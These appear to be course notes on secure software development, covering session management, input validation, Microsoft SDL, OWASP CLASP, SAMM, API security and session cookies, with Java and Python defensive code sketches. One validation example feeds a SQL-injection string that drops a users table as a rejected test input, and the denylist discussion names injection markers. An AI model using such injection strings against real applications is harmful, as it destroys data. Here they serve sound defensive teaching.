version available, which potentially fixes all the well-known vulnerabilities, as
well as to review and change the default configuration to enhance its security by
following the recommendations described throughout this document.

The storage capabilities or repository used by the session management
mechanism to temporarily save the session IDs must be secure, protecting the
session IDs against local or remote accidental disclosure or unauthorized access.

Used vs. Accepted Session ID Exchange Mechanisms

A web application should make use of cookies for session ID exchange
management. If a user submits a session ID through a different exchange
mechanism, such as a URL parameter, the web application should avoid
accepting it as part of a defensive strategy to stop session fixation.

NOTE:

• Even if a web application makes use of cookies as its default session
ID exchange mechanism, it might accept other exchange mechanisms
too.
• It is therefore required to confirm via thorough testing all the
different mechanisms currently accepted by the web application when
processing and managing session IDs and limit the accepted session
ID tracking mechanisms to just cookies.
• In the past, some web applications used URL parameters, or even
switched from cookies to URL parameters (via automatic URL
rewriting), if certain conditions are met (for example, the
identification of web clients without support for cookies or not
accepting cookies due to user privacy concerns).

Transport Layer Security

In order to protect the session ID exchange from active eavesdropping and
passive disclosure in the network traffic, it is essential to use an encrypted
HTTPS (TLS) connection for the entire web session, not only for the
authentication process where the user credentials are exchanged. This may be
mitigated by HTTP Strict Transport Security (HSTS) for a client that supports
it.

Additionally, the Secure cookie attribute must be used to ensure the session ID
is only exchanged through an encrypted channel. The usage of an encrypted
communication channel also protects the session against some session fixation
attacks where the attacker is able to intercept and manipulate the web traffic to
inject (or fix) the session ID on the victim's web browser.
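
A sketch of how the Secure (and HttpOnly) attributes can be set, assuming the Java Servlet API (3.0 or later); the generic cookie name id follows the earlier recommendation, and the helper name is invented for illustration.

```java
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;

public class SecureCookieSketch {
    // Illustrative helper: issue a session cookie that is only sent over TLS
    // and is not readable from JavaScript.
    static void setSessionCookie(HttpServletResponse response, String sessionId) {
        Cookie cookie = new Cookie("id", sessionId); // generic name, as recommended earlier
        cookie.setSecure(true);    // only transmit over HTTPS
        cookie.setHttpOnly(true);  // hide from document.cookie (mitigates XSS-based theft)
        cookie.setPath("/");
        response.addCookie(cookie);
        // SameSite is not exposed by older Servlet APIs; it can be added by writing
        // the Set-Cookie header directly if needed.
    }
}
```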

The following set of best practices are focused on protecting the session ID
(specifically when cookies are used) and helping with the integration of HTTPS
within the web application:

• Do not switch a given session from HTTP to HTTPS, or vice-versa,
as this will disclose the session ID in the clear through the network.
• When redirecting to HTTPS, ensure that the cookie is set
or regenerated after the redirect has occurred.
• Do not mix encrypted and unencrypted contents (HTML pages,
images, CSS, JavaScript files, etc) in the same page, or from the same
domain.
• Where possible, avoid offering public unencrypted contents and
private encrypted contents from the same host. Where insecure
content is required, consider hosting this on a separate insecure
domain.
• Implement HTTP Strict Transport Security (HSTS) to enforce
HTTPS connections.
It is important to emphasize that TLS does not protect against session ID
prediction, brute force, client-side tampering or fixation; however, it does
provide effective protection against an attacker intercepting or stealing session
IDs through a man-in-the-middle attack.

Goals of Input Validation

Input validation is performed to ensure only properly formed data is entering the
workflow in an information system, preventing malformed data from persisting
in the database and triggering malfunction of various downstream components.
Input validation should happen as early as possible in the data flow, preferably
as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation,
including not only Internet-facing web clients but also backend feeds over
extranets, from suppliers, partners, vendors or regulators, each of which may be
compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of
preventing XSS, SQL Injection and other attacks which are covered in
respective cheat sheets but can significantly contribute to reducing their impact
if implemented properly.

Input validation strategies

Input validation should be applied at both the syntactic and semantic levels.

Syntactic validation should enforce correct syntax of structured fields (e.g.,
SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific
business context (e.g., start date is before end date, price is within expected
range).

It is always recommended to prevent attacks as early as possible in the
processing of the user's (attacker's) request. Input validation can be used to
detect unauthorized input before it is processed by the application.

Implementing input validation

Input validation can be implemented using any programming technique that
allows effective enforcement of syntactic and semantic correctness, for
example:
• Data type validators available natively in web application frameworks
(such as Django Validators, Apache Commons Validators etc).
• Validation against JSON Schema and XML Schema (XSD) for input
in these formats.
• Type conversion (e.g., Integer.parseInt() in Java, int() in Python) with
strict exception handling
• Minimum and maximum value range check for numerical parameters
and dates, minimum and maximum length check for strings.
• Array of allowed values for small sets of string parameters (e.g., days
of week).
• Regular expressions for any other structured data covering the whole
input string (^...$) and not using "any character" wildcard (such
as . or \S)
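
Two of the techniques listed above, strict type conversion with exception handling and a regular expression anchored with ^...$ so it covers the whole input string, are shown in the sketch below. The field names and value ranges are invented for illustration.

```java
import java.util.regex.Pattern;

public class InputValidationSketch {
    // Anchored pattern: matches the entire input, not just a substring.
    private static final Pattern PRODUCT_CODE = Pattern.compile("^[A-Z]{3}-\\d{4}$");

    // Type conversion with strict exception handling plus a range check.
    static int parseQuantity(String raw) {
        try {
            int quantity = Integer.parseInt(raw.trim());
            if (quantity < 1 || quantity > 100) {
                throw new IllegalArgumentException("quantity out of range: " + quantity);
            }
            return quantity;
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("quantity is not a number", e);
        }
    }

    static boolean isValidProductCode(String raw) {
        return raw != null && PRODUCT_CODE.matcher(raw).matches();
    }

    public static void main(String[] args) {
        System.out.println(parseQuantity("42"));            // 42
        System.out.println(isValidProductCode("ABC-1234")); // true
        System.out.println(isValidProductCode("<script>")); // false
    }
}
```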

Allowlist vs Denylist

It is a common mistake to use denylist validation in order to try to detect
possibly dangerous characters and patterns like the apostrophe ' character, the
string 1=1, or the <script> tag, but this is a massively flawed approach as it is
trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where
the ' character is fully legitimate. For more information on XSS filter evasion,
see the OWASP XSS Filter Evasion Cheat Sheet.

Allowlist validation is appropriate for all input fields provided by the user.
Allowlist validation involves defining exactly what IS authorized, and by
definition, everything else is not authorized.

If it's well-structured data, like dates, social security numbers, zip codes, email
addresses, etc. then the developer should be able to define a strong validation
pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or
radio buttons, then the input needs to match exactly one of the values offered to
the user in the first place.

Validating free-form Unicode text


Free-form text, especially with Unicode characters, is perceived as difficult to
validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-
aware output encoding and quite clearly demonstrates that input validation
is not the primary safeguard against Cross-Site Scripting. If your users want to
type apostrophe ' or less-than sign < in their comment field, they might have
perfectly legitimate reason for that and the application's job is to properly
handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

• Normalization: Ensure canonical encoding is used across all the text
and no invalid characters are present.
• Character categories allow-listing: Unicode allows listing
categories such as "decimal digits" or "letters" which not only covers
the Latin alphabet but also various other scripts used globally (e.g.,
Arabic, Cyrillic, CJK ideographs etc).
• Individual character allow-listing: If you allow letters and
ideographs in names and also want to allow the apostrophe ' for Irish
names, but don't want to allow the whole punctuation category, you
can allow-list just that single character.
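
A sketch of the normalization plus character-category approach in Java. The allowed set here (Unicode letters and marks, space, hyphen, apostrophe) is an assumption chosen for a hypothetical person-name field and would differ per application.

```java
import java.text.Normalizer;
import java.util.regex.Pattern;

public class FreeTextValidationSketch {
    // Allow Unicode letters and combining marks (so names in any script pass),
    // plus space, hyphen and apostrophe; everything else is rejected.
    private static final Pattern NAME = Pattern.compile("^[\\p{L}\\p{M}' \\-]{1,100}$");

    static boolean isValidName(String raw) {
        if (raw == null) return false;
        // Normalize to a canonical form before validating.
        String normalized = Normalizer.normalize(raw, Normalizer.Form.NFC);
        return NAME.matcher(normalized).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValidName("O'Brian"));                            // true
        System.out.println(isValidName("Łukasz Grüß"));                        // true: non-Latin letters allowed
        System.out.println(isValidName("Robert'); DROP TABLE users;--"));      // false
    }
}
```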

1. Regular Expression Examples:


- Validating a U.S. Zip Code: `^\d{5}(-\d{4})?$`
- Validating U.S. State Selection:

`^(AA|AE|AP|AL|AK|AS|AZ|AR|CA|CO|CT|DE|DC|FM|FL|GA|GU|HI|ID|IL|IN|IA|KS|KY|LA|ME|MH|MD|MA|MI|MN|MS|MO|MT|NE|NV|NH|NJ|NM|NY|NC|ND|MP|OH|OK|OR|PW|PA|PR|RI|SC|SD|TN|TX|UT|VT|VI|VA|WA|WV|WI|WY)$`

2. Java Regex Usage Example:


- Defines a regex pattern for validating zip codes and shows how to use it in
Java servlet doPost method.
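
The original code listing is not reproduced in these notes, so the sketch below is a hedged reconstruction of what such a servlet might look like; the parameter name zip and the error handling are assumptions.

```java
import java.io.IOException;
import java.util.regex.Pattern;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ZipCodeServlet extends HttpServlet {
    // Same pattern as above: 5 digits, optionally followed by "-" and 4 digits.
    private static final Pattern ZIP = Pattern.compile("^\\d{5}(-\\d{4})?$");

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws IOException {
        String zip = request.getParameter("zip"); // assumed form field name

        // Server-side validation: reject the request if the value is missing or malformed.
        if (zip == null || !ZIP.matcher(zip).matches()) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Invalid zip code");
            return;
        }

        response.setContentType("text/plain");
        response.getWriter().println("Zip code accepted");
    }
}
```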

3. Client-Side vs Server-Side Validation:


- Emphasizes the importance of server-side validation over client-side
validation due to potential security risks with client-side validation bypass.

4. File Upload Validation:


- Highlights practices for securely handling file uploads, including validating
file type, size, and ensuring safe storage and serving of uploaded files.
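
A hedged sketch of the checks mentioned above: an extension allowlist, a size cap, and storage under a new server-generated name. The limits and extension list are illustrative assumptions, and real deployments should also validate the content type and store uploads outside the web root.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

public class FileUploadValidationSketch {
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("png", "jpg", "jpeg", "pdf");
    private static final long MAX_SIZE_BYTES = 5L * 1024 * 1024; // 5 MB cap (illustrative)

    // Validates the upload and stores it under a random server-chosen name.
    static Path storeUpload(String originalName, byte[] content, Path uploadDir) throws Exception {
        int dot = originalName.lastIndexOf('.');
        String ext = (dot >= 0) ? originalName.substring(dot + 1).toLowerCase(Locale.ROOT) : "";

        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("File type not allowed: " + ext);
        }
        if (content.length > MAX_SIZE_BYTES) {
            throw new IllegalArgumentException("File too large");
        }

        // Never trust the client-supplied file name; generate our own.
        Files.createDirectories(uploadDir);
        Path target = uploadDir.resolve(UUID.randomUUID() + "." + ext);
        return Files.write(target, content);
    }

    public static void main(String[] args) throws Exception {
        Path stored = storeUpload("report.pdf", "dummy".getBytes(), Path.of("uploads"));
        System.out.println("Stored as " + stored);
    }
}
```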

5. Email Address Validation:


- Mentions syntactic validation using regex and semantic validation through
verification emails to ensure correctness and legitimacy of email addresses.

6. Disposable Email Addresses:


- Discusses challenges in blocking disposable email addresses and
considerations for implementing sub-addressing.

UNIT 2
THE MICROSOFT SECURITY DEVELOPMENT LIFECYCLE

Microsoft SDL, or the Microsoft Security Development Lifecycle, is a robust
framework developed by Microsoft to help ensure that software products
developed by the company are designed, developed, and maintained with
security in mind. Here's a detailed explanation of the Microsoft SDL:

Overview:
The Microsoft SDL is a comprehensive approach to integrating security
throughout the entire software development lifecycle. It aims to reduce
vulnerabilities in software by addressing security at every phase of
development, from initial planning through to release and beyond.

Phases of Microsoft SDL:


1. Training & Requirements:
- Security Training: Developers and stakeholders undergo security training to
understand common vulnerabilities and secure coding practices.
- Security Requirements: Define security requirements early in the
development process to set expectations for security features and controls.

2. Design:
- Threat Modeling: Identify potential security threats and vulnerabilities
specific to the application or system being developed.
- Architecture & Design Reviews: Review the software architecture and
design from a security perspective to identify and mitigate potential
vulnerabilities.

3. Implementation:
- Secure Coding Guidelines: Follow established secure coding guidelines to
mitigate common vulnerabilities such as buffer overflows, injection attacks, etc.
- Code Review: Perform regular code reviews focused on security to identify
and fix vulnerabilities early in the development process.
- Static Analysis: Use automated tools to analyze source code for security
issues.

4. Verification:
- Security Testing: Conduct various types of security testing, including
penetration testing, fuzz testing, and vulnerability scanning, to identify and
remediate security weaknesses.
- Quality Assurance: Ensure that security requirements and best practices are
adhered to throughout the testing phase.

5. Release & Response:


- Security Signoff: Obtain security signoff before releasing the product to
ensure that all identified security issues have been addressed.
- Incident Response: Have a plan in place to respond to security incidents
quickly and effectively, including releasing patches and updates as needed.

6. Support & Maintenance:


- Security Updates: Provide timely security updates and patches throughout
the product lifecycle to address newly discovered vulnerabilities.
- Customer Guidance: Offer guidance and resources to customers on how to
securely deploy and configure the product.

Key Principles of Microsoft SDL:


- Security by Design: Integrate security considerations into every phase of
development rather than treating it as an afterthought.
- Risk Management: Identify and prioritize security risks based on potential
impact and likelihood.
- Comprehensive Approach: Combine multiple security activities (training,
testing, reviews) to address security holistically.
- Continuous Improvement: Learn from security incidents and feedback to
improve the SDL over time.

Benefits of Microsoft SDL:

- Reduced Vulnerabilities: Software developed using SDL tends to have fewer
security vulnerabilities.
- Improved Compliance: Helps in meeting regulatory and compliance
requirements related to software security.
- Enhanced Trust: Builds trust with customers by demonstrating a commitment
to security and privacy.
- Cost Savings: Reduces the cost of addressing security issues post-release by
catching them earlier in the development process.

Adoption:

- Microsoft SDL has been adopted not only within Microsoft for its own
products but also widely recommended as a best practice across the software
industry.
- Many organizations have adapted the principles of SDL to develop their own
secure development lifecycles tailored to their specific needs.
In conclusion, Microsoft SDL represents a proactive and structured approach to
integrating security into software development, aiming to create more secure
and reliable products that meet the highest standards of security and privacy.
OWASP CLASP

OWASP CLASP (Comprehensive, Lightweight Application Security Process)
represents a structured approach to integrating security into software
development processes. It aims to ensure that security measures are not an
afterthought but rather an integral part of the entire software lifecycle, from
inception to deployment and maintenance.
Views and Components of OWASP CLASP

1. Views:
OWASP CLASP is organized into five distinct views, each serving a specific
purpose in enhancing application security:

- Concepts View: Defines fundamental security concepts and principles that
developers and stakeholders need to understand.
- Role-Based View: Identifies roles and responsibilities within the
development team concerning security tasks and oversight.
- Activity-Assessment View: Provides a framework for assessing security-
related activities throughout the development lifecycle.
- Activity-Implementation View: Outlines specific security activities that
should be implemented during development to mitigate risks.
- Vulnerability View: Focuses on identifying and categorizing potential
vulnerabilities within software systems.

2. Vulnerability Use Cases:


OWASP CLASP utilizes vulnerability use cases to illustrate scenarios where
security vulnerabilities may occur. These use cases are based on traditional
component architectures like monolithic UNIX systems, mainframes, and
distributed architectures (HTTPS & TCP/IP). However, it acknowledges
potential gaps when applied to modern software architectures.

3. CLASP Taxonomy:
The taxonomy within OWASP CLASP categorizes security-related issues in
several dimensions:

- Problem Types: Classifies underlying issues causing vulnerabilities.


- Categories: Divides problem types into specific groups for diagnosis and
resolution.
- Exposure Periods: Identifies phases within the Software Development
Lifecycle (SDLC) where vulnerabilities might be introduced.
- Consequences: Describes the potential impacts and outcomes of exploited
vulnerabilities.
- Platforms and Languages: Specifies which platforms and programming
languages could be affected by identified vulnerabilities.
- Resources Required: Evaluates the resources and capabilities needed for
potential attacks.
- Risk Assessment: Assesses the severity and likelihood of vulnerabilities
being exploited.
- Avoidance and Mitigation Periods: Recommends phases within SDLC for
implementing preventive measures and countermeasures against vulnerabilities.

Integration and Application


OWASP CLASP encourages a proactive approach to security by embedding
security practices into the development lifecycle. It emphasizes structured,
repeatable, and measurable processes to ensure that security considerations are
addressed from the early stages of development onward. By integrating
OWASP CLASP, organizations can enhance the security posture of their
software products, mitigate risks associated with vulnerabilities, and build
confidence among stakeholders and end-users.

The significance and benefits of OWASP CLASP:

1. Holistic Security Approach: OWASP CLASP promotes a holistic approach to
application security by encompassing not just technical aspects but also
organizational processes and roles. This ensures that security is considered
comprehensively across all facets of software development and deployment.
2. Adaptability to Modern Architectures: While originally based on traditional
architectures, OWASP CLASP can be adapted and applied to modern software
architectures such as microservices, cloud-native applications, and IoT systems.
This adaptability underscores its relevance in contemporary software
development landscapes.
3. Measurable Security Practices: One of the strengths of OWASP CLASP lies
in its emphasis on measurability. By defining specific security activities and
roles, organizations can measure their adherence to these practices and track
improvements in their security posture over time.
4. Community and Resources: Being a part of OWASP (Open Web Application
Security Project), OWASP CLASP benefits from a rich community of security
professionals and resources. This community support provides access to best
practices, tools, and case studies that can aid in the successful implementation
of CLASP.
5. Compliance and Assurance: Adopting OWASP CLASP can assist
organizations in meeting regulatory compliance requirements related to
software security, thereby enhancing assurance and trust among clients, users,
and regulatory bodies.
6. Educational and Training Opportunities: OWASP CLASP offers educational
resources and training programs aimed at equipping developers and security
practitioners with the knowledge and skills needed to effectively implement
security measures throughout the SDLC.
7. Continuous Improvement: By integrating OWASP CLASP into their
development processes, organizations can foster a culture of continuous
improvement in security practices. This iterative approach helps in staying
ahead of emerging threats and evolving security challenges.

Overall, OWASP CLASP stands as a valuable framework for organizations
aiming to elevate their software security standards systematically and
sustainably. Its structured approach, coupled with community support and
adaptability, positions it as a cornerstone in modern application security
strategies.

Conclusion
In conclusion, OWASP CLASP serves as a comprehensive framework for
organizations looking to bolster the security of their software applications. By
leveraging its structured views, vulnerability use cases, and taxonomy,
development teams can systematically integrate security measures into their
workflows. This approach not only helps in identifying and addressing potential
vulnerabilities but also ensures that security becomes an inherent part of the
software development culture, fostering safer and more reliable software
products.

THE SOFTWARE ASSURANCE MATURITY MODEL (SAMM): A COMPREHENSIVE OVERVIEW

Overview
The Software Assurance Maturity Model (SAMM) is a structured framework
designed to help organizations assess and improve their software security
practices. Developed to address the increasing threat landscape surrounding
software systems, SAMM provides a roadmap for organizations to build and
enhance their software assurance programs systematically.

Structure of SAMM
SAMM consists of twelve Security Practices, each addressing critical aspects of
software security. These practices are divided into three maturity levels, each
level representing a higher degree of maturity and capability in implementing
secure software development practices. The three maturity levels are:
1. Level 1 - Initial: This level signifies basic ad-hoc practices without formal
processes in place. It's characterized by a reactive approach to security issues.
2. Level 2 - Managed: At this level, organizations begin to establish formalized
processes and policies for security. There's a more proactive approach to
identifying and addressing security concerns.
3. Level 3 - Optimizing: The highest level where organizations have mature,
well-defined processes that are continuously improved based on feedback and
metrics. This level aims for optimization and integration of security throughout
the software development lifecycle.
Assessment Methodology
Assessing an organization's maturity in SAMM involves evaluating its
adherence to each Security Practice across the three levels. SAMM provides
assessment worksheets for each practice, facilitating both lightweight and
detailed assessment approaches:
- Lightweight Assessment: Involves scoring based on predefined answers in the
assessment worksheets, providing a quick snapshot of current maturity levels.
- Detailed Assessment: Involves deeper audit and verification of practices,
including checking success metrics and ensuring that prescribed activities are in
place. This approach offers a more thorough understanding of an organization's
security posture.

Benefits of SAMM
Implementing SAMM offers several benefits to organizations:
- Structured Improvement: SAMM provides a structured approach to improving
software security, helping organizations move from reactive to proactive
security measures.
- Benchmarking: Enables organizations to benchmark their security practices
against industry standards and best practices.
- Risk Reduction: By improving software assurance practices, SAMM helps
mitigate security risks associated with software vulnerabilities and threats.
- Compliance and Assurance: Facilitates compliance with regulatory
requirements and enhances stakeholder assurance by demonstrating a
commitment to secure software development.

Practical Application
Organizations can utilize SAMM not only to assess their current security
posture but also to develop a roadmap for future improvements. By identifying
gaps and weaknesses in their security practices, organizations can prioritize
initiatives that will have the most significant impact on improving overall
software security.

Conclusion

In conclusion, SAMM is a powerful framework that empowers organizations to enhance their software assurance capabilities systematically. By leveraging
SAMM's structured approach, organizations can achieve higher levels of
maturity in software security, reduce risks, and build more resilient software
systems. As the threat landscape continues to evolve, SAMM remains a
valuable tool for organizations committed to securing their software assets
effectively.
UNIT-3
API SECURITY

Understanding API Security


API (Application Programming Interface) security is crucial for protecting the
interactions between various software applications. It involves safeguarding the
data, resources, and operations facilitated by the API from unauthorized access
and malicious activities. Here’s why API security is important and how it can be
effectively implemented.
Why API Security is Necessary
1. User Access Control:
- APIs may be accessible to users with different levels of authority. For
example, some operations might only be available to administrators. Without
proper access controls, unauthorized users could perform restricted actions.
- APIs exposed to the internet are accessible to anyone, including malicious
users and bots. Proper security ensures that only legitimate users can access the
API.
2. Combination of Operations:
- Individual operations might be secure, but combinations of these operations
could create vulnerabilities. For example, a banking API might secure
withdrawal and deposit operations individually but fail to ensure that deposits
come from legitimate sources. A transfer operation that verifies both ends of a
transaction would be more secure.

3. Implementation Vulnerabilities:
- Poor implementation, such as not checking input sizes, can lead to
vulnerabilities like Denial of Service (DoS) attacks. Ensuring secure
implementation practices is essential for API security.
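To make the input-size point concrete, here is a minimal sketch in Python (standard library only) of rejecting oversized request bodies before any expensive processing; the size limit, handler name, and return convention are illustrative assumptions rather than part of any particular API.

```python
MAX_BODY_BYTES = 64 * 1024  # illustrative limit; tune per endpoint

def handle_create_message(raw_body: bytes) -> tuple[int, str]:
    """Reject oversized input before doing any expensive parsing."""
    if len(raw_body) > MAX_BODY_BYTES:
        # Returning early stops a single huge request from tying up CPU and
        # memory -- a simple denial-of-service vector.
        return 413, "Payload Too Large"
    text = raw_body.decode("utf-8")
    # ... normal validation and processing would follow here ...
    return 200, f"accepted {len(text)} characters"

if __name__ == "__main__":
    print(handle_create_message(b"hello"))        # (200, 'accepted 5 characters')
    print(handle_create_message(b"x" * 100_000))  # (413, 'Payload Too Large')
```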

Elements of API Security


1. Assets
- Information Assets: Customer data (names, addresses, credit card
information), sensitive information (political affiliations, sexual orientation).
- Physical Assets: Servers, databases, and devices running the API.
- Anything valuable or that could cause harm if compromised should be
considered an asset.

2. Security Goals
- Confidentiality: Ensuring that data is accessible only to authorized users.
- Integrity: Preventing unauthorized creation, modification, or destruction of
data.
- Availability: Ensuring that the API remains accessible to legitimate users.
- Other goals include accountability (tracking user actions) and non-
repudiation (users cannot deny their actions).
3. Environments and Threat Models
- Threats: Events or circumstances that could compromise the API’s security
goals.
- Threat Modeling: The process of identifying and managing potential threats.
- Trust Boundaries: Areas within the system managed by the same entity.
Identifying data flows and trust boundaries helps in pinpointing where threats
might occur.
4. Common Security Mechanisms
- Authentication: Verifying the identity of users.
- Authorization: Ensuring users can only perform actions they are permitted
to.
- Input Validation: Checking data inputs to prevent malicious data from
compromising the API.
- Rate Limiting: Controlling the number of requests a user can make to
prevent abuse.
- Encryption: Protecting data in transit and at rest.
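As an illustration of the rate-limiting mechanism listed above, the following is a minimal token-bucket sketch in Python; the capacity and refill rate are arbitrary demonstration values, not a recommendation.

```python
import time

class TokenBucket:
    """Allow bursts up to `capacity` requests, refilled at `rate` tokens/second."""

    def __init__(self, capacity: float, rate: float):
        self.capacity = capacity
        self.rate = rate
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens for the elapsed time, capped at the bucket capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

if __name__ == "__main__":
    bucket = TokenBucket(capacity=5, rate=1.0)   # ~1 request/second with bursts of 5
    print([bucket.allow() for _ in range(7)])    # first 5 True, then False until refill
```

In a real API the server would keep one bucket per client (or per API key) and return HTTP 429 when `allow()` returns False.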

The STRIDE Threat Model


A popular method for identifying potential threats is the STRIDE model:
- Spoofing: Pretending to be someone else.
- Tampering: Altering data or settings without authorization.
- Repudiation: Denying having performed an action.
- Information Disclosure: Revealing private information.
- Denial of Service (DoS): Preventing access to the API.
- Elevation of Privilege: Gaining access to unauthorized functionalities.
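A simple way to apply the model is to walk each API operation through the six categories and note the typical countermeasure for each. The Python sketch below is purely illustrative; real threat modeling is done per operation and per trust boundary, and this mapping is not exhaustive.

```python
# Illustrative STRIDE-to-countermeasure mapping (not exhaustive).
STRIDE_CONTROLS = {
    "Spoofing": "Authentication (passwords, tokens, mTLS)",
    "Tampering": "Integrity checks, signatures, authorization on writes",
    "Repudiation": "Audit logging tied to authenticated identities",
    "Information Disclosure": "Encryption in transit/at rest, access control",
    "Denial of Service": "Rate limiting, input size limits, quotas",
    "Elevation of Privilege": "Least-privilege authorization checks",
}

def review(operation: str) -> None:
    """Print a checklist with one question per STRIDE category."""
    print(f"Threat review for: {operation}")
    for threat, control in STRIDE_CONTROLS.items():
        print(f"  - {threat}: mitigated? (typical control: {control})")

if __name__ == "__main__":
    review("POST /transfer")
```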

Designing Secure APIs


1. Planning and Design:
- Consider security from the start rather than adding it later.
- Use threat modeling to anticipate potential security issues.
2. Implementation:
- Follow secure coding practices.
- Regularly test for vulnerabilities and address them promptly.
3. Monitoring and Maintenance:
- Continuously monitor for security breaches.
- Update and patch the API regularly to address new threats.

Conclusion
API security is an ongoing process involving planning, implementation,
monitoring, and regular updates. By understanding the assets, defining security
goals, modeling threats, and applying appropriate security mechanisms, you can
protect your API from unauthorized access and malicious activities.

SESSION COOKIES
What are Session Cookies?
Session cookies are small pieces of data that a web server sends to a user's web
browser. These cookies are used to identify and manage the user's session,
which is the period during which the user interacts with the web application.
Session cookies are temporary and are typically deleted once the user closes
their browser.
Key Characteristics of Session Cookies
1. Temporary Storage: Session cookies are stored in the browser's memory and
are not saved on the user's device. They are deleted when the browser is closed.
2. Limited Lifetime: These cookies have a short lifespan, usually lasting only
for the duration of the user session.
3. Secure Handling: Session cookies can be configured to be sent only over
secure connections (HTTPS) and can be marked as HttpOnly to prevent access
via JavaScript, enhancing security.

How Session Cookies Work


1. User Authentication: When a user logs in, their credentials are verified, and if
correct, the server generates a session ID. This ID is sent to the user's browser in
the form of a session cookie.
2. Session Management: Each subsequent request from the user's browser
includes the session cookie, allowing the server to recognize the user and
maintain their session state.
3. Session Expiration: The session can expire either when the user logs out or
after a certain period of inactivity, depending on the server's configuration.

Usage in Token-Based Authentication


In token-based authentication systems, session cookies can be used to store the
authentication token:
1. Login: The user logs in by providing their credentials to a dedicated login
endpoint.
2. Token Issuance: Upon successful authentication, the server generates a time-
limited token and sends it to the browser as a session cookie.
3. Subsequent Requests: For each subsequent API request, the browser includes
the session cookie containing the token, which the server uses to authenticate
the request without needing to verify the user's credentials again.

Advantages of Using Session Cookies


1. Enhanced Security: By not storing passwords in each request and limiting the
session's lifespan, session cookies reduce the risk of credential exposure.
2. Performance Improvement: Since the server only verifies the user's
credentials once per session, it reduces the computational overhead associated
with password hashing on every request.
3. User Experience: Session cookies enable a smoother and more seamless user
experience, avoiding repeated login prompts and allowing for persistent logins
within the same session.

Preventing Cross-Site Request Forgery (CSRF)


To protect against CSRF attacks, where malicious websites can trick a user's
browser into making unauthorized requests, session cookies can be fortified
using several techniques:
1. SameSite Attribute: Setting the `SameSite` attribute of cookies to `Strict` or
`Lax` helps prevent cookies from being sent along with cross-site requests.
2. CSRF Tokens: Including CSRF tokens in forms and validating them on the
server ensures that requests originate from the legitimate site.
3. Secure and HttpOnly Flags: Marking cookies with the `Secure` flag ensures
they are only sent over HTTPS, and the `HttpOnly` flag prevents JavaScript
access, mitigating the risk of cross-site scripting (XSS) attacks.
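To illustrate the CSRF-token technique from the list above, here is a minimal Python sketch of the synchronizer-token pattern. The in-memory dictionary is a stand-in for real server-side session storage, and the function names are hypothetical.

```python
import hmac
import secrets

# Hypothetical in-memory stand-in for server-side session storage.
SESSION_CSRF_TOKENS: dict[str, str] = {}

def issue_csrf_token(session_id: str) -> str:
    """Generate an unguessable token, store it server-side, and embed it in forms."""
    token = secrets.token_urlsafe(32)
    SESSION_CSRF_TOKENS[session_id] = token
    return token

def validate_csrf_token(session_id: str, submitted: str) -> bool:
    """Constant-time comparison so attackers cannot learn the token byte by byte."""
    expected = SESSION_CSRF_TOKENS.get(session_id, "")
    return bool(expected) and hmac.compare_digest(expected, submitted)

if __name__ == "__main__":
    sid = "session-abc"
    form_token = issue_csrf_token(sid)
    print(validate_csrf_token(sid, form_token))      # True: legitimate form post
    print(validate_csrf_token(sid, "forged-value"))  # False: likely cross-site forgery
```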

Example Implementation in a Web Application


1. Login Endpoint: The user submits their username and password to `/login`.
2. Server Processing: The server verifies the credentials and generates a session
ID or token.
3. Cookie Setting: The server sets a session cookie with the token and attributes
like `Secure`, `HttpOnly`, and `SameSite`.
4. Authenticated Requests: The user's browser includes the session cookie in
subsequent requests, allowing the server to validate the session without
rechecking credentials.
5. Logout: When the user logs out, the server invalidates the session ID or
token, and the browser deletes the session cookie.
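The steps above can be sketched as a small Flask-style application. This is a minimal illustration only, assuming Flask is installed: the in-memory user and session stores, cookie name, and endpoint paths are made-up examples, and a real service would hash passwords and persist sessions securely.

```python
import secrets
from flask import Flask, request, jsonify, make_response

app = Flask(__name__)
SESSIONS: dict[str, str] = {}   # token -> username (demo only; use real storage)
USERS = {"demo": "password"}    # demo only; real systems store password hashes

@app.post("/login")
def login():
    body = request.get_json(force=True)
    if USERS.get(body.get("username")) != body.get("password"):
        return jsonify(error="invalid credentials"), 401
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = body["username"]
    resp = make_response(jsonify(status="ok"))
    # Secure + HttpOnly + SameSite, as described in step 3 above.
    resp.set_cookie("session", token, secure=True, httponly=True, samesite="Strict")
    return resp

@app.post("/logout")
def logout():
    token = request.cookies.get("session", "")
    SESSIONS.pop(token, None)                 # invalidate the server-side session
    resp = make_response(jsonify(status="logged out"))
    resp.delete_cookie("session")             # ask the browser to drop the cookie
    return resp
```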

Session cookies are a fundamental component of web security and user session
management. They offer a balance between security and usability by
minimizing the need to repeatedly transmit sensitive information and enhancing
the user experience through persistent sessions. Properly configured, session
cookies can significantly bolster the security of web applications, especially
when combined with additional measures like CSRF tokens and secure cookie
attributes.
TOKEN-BASED AUTHENTICATION

Digital transformation brings security concerns for users who want to protect their identity from prying eyes. According to Norton, on average about 800,000 accounts are hacked every year, so there is growing demand for high-security systems and cybersecurity regulations around authentication.
Traditional methods rely on single-level authentication with a username and password to grant access to web resources. Users tend to keep easy passwords or reuse the same password on multiple platforms for convenience. The fact is, there is always a wrong eye on your web activities, waiting to take unfair advantage later.
